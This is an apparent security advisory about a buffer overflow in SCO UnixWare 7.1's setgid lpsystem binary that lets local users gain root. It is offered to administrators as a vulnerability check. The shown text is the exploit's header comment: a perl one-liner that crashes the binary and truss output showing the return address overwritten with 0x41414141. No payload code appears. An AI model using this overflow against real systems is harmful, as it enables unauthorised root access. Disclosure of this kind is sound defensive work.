SCO UnixWare 7.1's sgid-lps '/usr/sbin/lpsystem' will allow any local user to gain root privilege. The following is an exploit code that can be used by administrators to verify whether they are vulnerable.
Credit:
The information has been provided by al3x hernandez.
Exploit:
/**
** UnixWare 7.1 LPsystem Xploit BufferOverflow
**
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
**
** Special Greets to: White-B, Pablo S0r & Paco Spain.
**
**
** Technical Details:
**
** # ls -la /usr/sbin/lpsystem
** ---s--x--x 1 root lp 41840 Ap 4 998 /usr/sbin/lpsystem
** #
** # /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
** Segmentation Fault - core dumped
** #
**
**
** Maped with truss :
**
** # truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
**
** [...]
**
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 475
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, 0x0830B740, 1032) = 0
** close(3) = 0
** write(4, " A A A A A A A A A A A A".., 549) = 549
** close(4) = 0
** rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
** open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
** fcntl(3, F_SETLK, 0x07F53C2C) = 0
** fcntl(3, F_GETFL, 0x00000009) = 9
** lseek64(3, 0, 2) = 1542283
** write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
** write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
** close(3) = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
** open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
** close(3) = 0
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
** open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
** ioctl(3, I_CANPUT, 0x00000000) = 1
** getgid() = 103 [ 103 ]
** getuid() = 0 [ 0 ]
** Incurred fault #6, FLTBOUNDS %pc = 0x08072410
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** Received signal #11, SIGSEGV [default]
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** *** process killed ***
**
** Download the patch Sco^s page http://www.sco.com
** Bug reported 04-OCT-2001 and publish in security^s
** pages 08-OCT-2001.
**
** Modify this c0de for u use personal :-)
**/
